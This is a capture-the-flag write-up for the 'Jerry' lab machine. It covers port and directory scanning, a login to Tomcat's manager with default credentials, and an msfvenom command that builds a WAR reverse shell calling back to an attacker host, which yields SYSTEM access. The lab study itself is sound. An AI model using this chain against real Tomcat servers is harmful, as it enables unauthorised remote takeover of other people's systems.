Jerry

OS: Windows, Difficulty: Easy, IP: 10.10.10.95

Initial Enumeration

sudo nmap -T5 -p- -oN T-all 10.10.10.95
 Nmap 7.70 scan initiated Sat Jul  6 13:24:49 2019 as: nmap -sV -sC -p 8080 -oN O-Detailed 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.26s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul  6 13:25:05 2019 -- 1 IP address (1 host up) scanned in 15.85 seconds

Port 8080 was the default installation of the Apache Tomcat server. The server was last updated in May 2018, hence had no exploits in Searchsploit.

gobuster dir -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-medium -u http://10.10.10.95:8080
/docs (Status: 302)
/examples (Status: 302)
/manager (Status: 302)

The manager one seemed interesting, and when I hit the URL it asked for credentials, I tried default tomcat credentials tomcat:s3cret and they worked.

User Own & Root Own

An option to deploy my own WAR file was available so I built up a reverse shell using msfvenom for the server.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.7 LPORT=9999 -f war > shell.war

The shell was uploaded and once this URL is hit I got a reverse shell as NT Authority/System

Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,598,893,056 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004d***

root.txt
04a8b***

Learning Outcome

Whenever you get a shell, check who you are before running around for enumerating the server. In this case it took me quite a while to understand that I was running as root since beginning of time.

PreviousBlueNextLegacy

Last updated